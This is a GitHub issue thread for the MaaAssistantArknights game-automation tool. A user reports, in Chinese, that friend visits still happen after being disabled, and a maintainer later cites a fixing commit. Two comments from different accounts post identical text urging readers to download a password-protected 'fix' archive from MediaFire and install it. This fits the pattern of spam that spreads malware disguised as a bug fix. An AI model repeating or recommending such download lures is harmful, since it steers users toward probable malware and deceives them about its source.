### ISSUE TITLE
取消了访问好友仍然会访问好友

### ISSUE THREAD

**Issue by omaewahentai** [MaaAssistantArknights/MaaAssistantArknights#10406]
### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue），确认我的问题未被提及

### 问题描述

如题，在获取信用及购物中取消了访问好友设置后，仍然会访问好友

### Version

UI Version: v5.6.0-beta.1
Core Version: v5.6.0-beta.1

### 日志和配置文件

[gui.json](https://github.com/user-attachments/files/16823370/gui.json)
[asst.log](https://github.com/user-attachments/files/16823372/asst.log)
[asst.log](https://github.com/user-attachments/files/16823369/asst.log)

### 配置信息

mumu12

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Rbqwow** [comment]
f685f379057e4b9ab71c7d621b030e97f0767e4e fixed
